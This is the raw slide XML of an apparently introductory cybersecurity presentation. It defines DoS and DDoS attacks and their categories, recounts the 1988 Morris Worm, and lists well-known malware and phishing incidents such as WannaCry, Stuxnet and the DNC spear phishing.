              <a:path w="5972400" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5972400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972400" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367727" y="2827358"/>
            <a:ext cx="5325462" cy="2953211"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5325462" h="2953211" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5325462" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5325462" y="2953211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2953211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;p5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733" name="Google Shape;733;p5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734" name="Google Shape;734;p5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DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p5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
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11114562" y="6774626"/>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Target System</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="6774626"/>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Single Source </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044258" y="3386901"/>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Traffic Flow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="739" name="Google Shape;739;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044258" y="6717476"/>
            <a:ext cx="1918798" cy="1546498"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="10386966" y="6693821"/>
            <a:ext cx="1621194" cy="1570153"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="Google Shape;741;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035760" y="8481375"/>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Resource Exhaustion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5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747" name="Google Shape;747;p5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748" name="Google Shape;748;p5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749" name="Google Shape;749;p5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750" name="Google Shape;750;p5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751" name="Google Shape;751;p5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752" name="Google Shape;752;p5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753" name="Google Shape;753;p5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754" name="Google Shape;754;p5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DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Google Shape;755;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110550" y="1415161"/>
            <a:ext cx="15976413" cy="43887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Denial of Service (DOS) attack aims to disrupt the normal functioning of a system or network, making it temporarily or indefinitely unavailable to users.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Theory Behind DOS Attacks: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DOS attacks exploit vulnerabilities in a system or network by overwhelming it with traffic or triggering events that consume resources. The objective is to exhaust available bandwidth, CPU, or memory, rendering the target system unresponsive to legitimate requests.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Google Shape;756;p5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762" name="Google Shape;762;p5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763" name="Google Shape;763;p5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764" name="Google Shape;764;p5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765" name="Google Shape;765;p5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766" name="Google Shape;766;p5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767" name="Google Shape;767;p5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768" name="Google Shape;768;p5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769" name="Google Shape;769;p5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DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Google Shape;770;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129600" y="1415161"/>
            <a:ext cx="15976413"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Flood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Description: Overwhelms the target with a high volume of traffic to exhaust its resources.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Examples: ICMP flood, UDP flood, SYN flood.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Application Layer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Description: Targets specific applications or services to consume their resources.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Examples: HTTP/HTTPS flood attacks, DNS query attacks.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Logic Bombs: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Description: Malicious code triggered by a specific event, causing a system to crash or become unavailable.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Example: A piece of malware set to erase critical system files on a specific date.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="Google Shape;771;p5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5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777" name="Google Shape;777;p5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778" name="Google Shape;778;p5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779" name="Google Shape;779;p5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780" name="Google Shape;780;p5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781" name="Google Shape;781;p5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782" name="Google Shape;782;p5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783" name="Google Shape;783;p5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784" name="Google Shape;784;p5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Example of DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Google Shape;785;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110550" y="1415161"/>
            <a:ext cx="1597641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Morris Worm (1988):</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Background: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Morris Worm, created by Robert Tappan Morris in 1988, is often considered one of the first instances of a worm-based Denial of Service (DOS) attack. While not a traditional DOS attack, it had significant disruptive effects on the targeted systems.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Details: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 Type: Worm-based DOS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Objective: Self-replicating worm to spread across the internet, unintentionally causing a DOS effect due to its rapid propagation.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How it Happened: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786" name="Google Shape;786;p5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792" name="Google Shape;792;p5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793" name="Google Shape;793;p5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794" name="Google Shape;794;p5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795" name="Google Shape;795;p5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796" name="Google Shape;796;p5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797" name="Google Shape;797;p5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798" name="Google Shape;798;p5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799" name="Google Shape;799;p5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Example of DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Google Shape;800;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110550" y="1415161"/>
            <a:ext cx="15976413" cy="58460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How it Happened:</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Self-Replication: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Morris Worm was designed to exploit vulnerabilities in Unix systems.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It spread by exploiting known vulnerabilities in various services, such as sendmail, finger, and weak passwords.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Unintended Consequences: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worm's replication was uncontrolled, leading to unintended consequences.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Infected systems started spawning multiple instances of the worm, consuming excessive resources and causing system slowdowns.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801" name="Google Shape;801;p5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5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807" name="Google Shape;807;p5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808" name="Google Shape;808;p5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809" name="Google Shape;809;p5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810" name="Google Shape;810;p5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811" name="Google Shape;811;p5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812" name="Google Shape;812;p5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813" name="Google Shape;813;p5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814" name="Google Shape;814;p5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Example of DoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Google Shape;815;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110550" y="1415161"/>
            <a:ext cx="15976413"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Impact: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rapid spread of the worm resulted in a significant increase in network traffic and system resource utilization.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Many systems became unresponsive or crashed due to the unintended self-replication behavior.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Consequences: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Thousands of computers were affected, causing widespread disruption.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incident led to increased awareness about computer security and the need for better practices to prevent and respond to such incidents.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Lessons Learned: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Morris Worm incident highlighted the importance of robust security practices and the potential unintended consequences of self-replicating malware. It played a role in shaping early discussions about computer security and the development of measures to protect against malicious code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="Google Shape;816;p5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6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822" name="Google Shape;822;p6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823" name="Google Shape;823;p6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824" name="Google Shape;824;p6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825" name="Google Shape;825;p6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826" name="Google Shape;826;p6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827" name="Google Shape;827;p6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828" name="Google Shape;828;p6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829" name="Google Shape;829;p6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DDoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Google Shape;830;p6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
        <p:nvSpPr>
          <p:cNvPr id="831" name="Google Shape;831;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16235095" y="92236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832" name="Google Shape;832;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16235097" y="92236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833" name="Google Shape;833;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="100584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834" name="Google Shape;834;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="15240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835" name="Google Shape;835;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="3577">
            <a:off x="142870" y="1219202"/>
            <a:ext cx="18307060" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="836" name="Google Shape;836;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="3577">
            <a:off x="142870" y="10061776"/>
            <a:ext cx="18307060" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Google Shape;837;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="1362076"/>
            <a:ext cx="2286000" cy="1574984"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2286000" h="1574984" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2286000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Google Shape;838;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11647962" y="2937060"/>
            <a:ext cx="5972400" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5972400" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5972400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972400" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358140" y="3568516"/>
            <a:ext cx="2286000" cy="1574984"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2286000" h="1574984" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2286000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635375" y="3568516"/>
            <a:ext cx="2286000" cy="1574984"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2286000" h="1574984" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2286000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358140" y="5630964"/>
            <a:ext cx="2286000" cy="1574984"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2286000" h="1574984" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2286000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Google Shape;842;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635375" y="5581650"/>
            <a:ext cx="2286000" cy="1574984"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2286000" h="1574984" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2286000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6463231" y="3658475"/>
            <a:ext cx="5041856" cy="2312952"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5041856" h="2312952" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5041856" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5041856" y="2312951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2312951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;844;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501140" y="101068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845" name="Google Shape;845;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13159740" y="100945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846" name="Google Shape;846;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368400" y="3469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DDoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Google Shape;847;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207941" y="101060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
        <p:nvSpPr>
          <p:cNvPr id="848" name="Google Shape;848;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11266962" y="7224710"/>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Target System</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849" name="Google Shape;849;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="7224710"/>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Multiple Sources </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5921375" y="8633775"/>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Resource Exhaustion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5921375" y="2604003"/>
            <a:ext cx="5972400" cy="58991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373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Traffic Flow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="852" name="Google Shape;852;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5790258" y="7052630"/>
            <a:ext cx="1918798" cy="1546498"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="853" name="Google Shape;853;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="10132966" y="6843393"/>
            <a:ext cx="1514996" cy="1755735"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>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6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859" name="Google Shape;859;p6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860" name="Google Shape;860;p6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861" name="Google Shape;861;p6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862" name="Google Shape;862;p6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863" name="Google Shape;863;p6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864" name="Google Shape;864;p6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865" name="Google Shape;865;p6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866" name="Google Shape;866;p6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DDoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110550" y="1415161"/>
            <a:ext cx="15976413" cy="39029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Distributed Denial of Service (DDoS) attack is a type of cyber attack in which multiple compromised computers are used to flood a target system or network with traffic, rendering it unavailable to users.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key distinction from a regular Denial of Service (DoS) attack is that the attack traffic comes from various sources, making it more challenging to mitigate and trace back to a single origin. DDoS attacks aim to overwhelm the target's resources, such as bandwidth, processing power, or memory, causing a disruption in normal service.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p6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54" name="Google Shape;154;p1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55" name="Google Shape;155;p1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56" name="Google Shape;156;p1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57" name="Google Shape;157;p1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58" name="Google Shape;158;p1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59" name="Google Shape;159;p1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60" name="Google Shape;160;p1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61" name="Google Shape;161;p1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ATTACKS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918577" y="1257301"/>
            <a:ext cx="16915665"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Malware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Definition: Malicious software designed to harm or exploit computer systems.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WannaCry (2017): Ransomware that spread globally, encrypting files and demanding a ransom for their release.</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Stuxnet (2010): Worm designed to target and disrupt Iran's nuclear program.</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Phishing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Definition: Deceptive attempts to obtain sensitive information by pretending to be a trustworthy entity.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Google Docs Phishing (2017): Attackers sent emails with a fake Google Docs link, aiming to steal Google account credentials.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Spear Phishing against DNC (2016): Targeted phishing attacks against the Democratic National Committee.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163" name="Google Shape;163;p1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72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
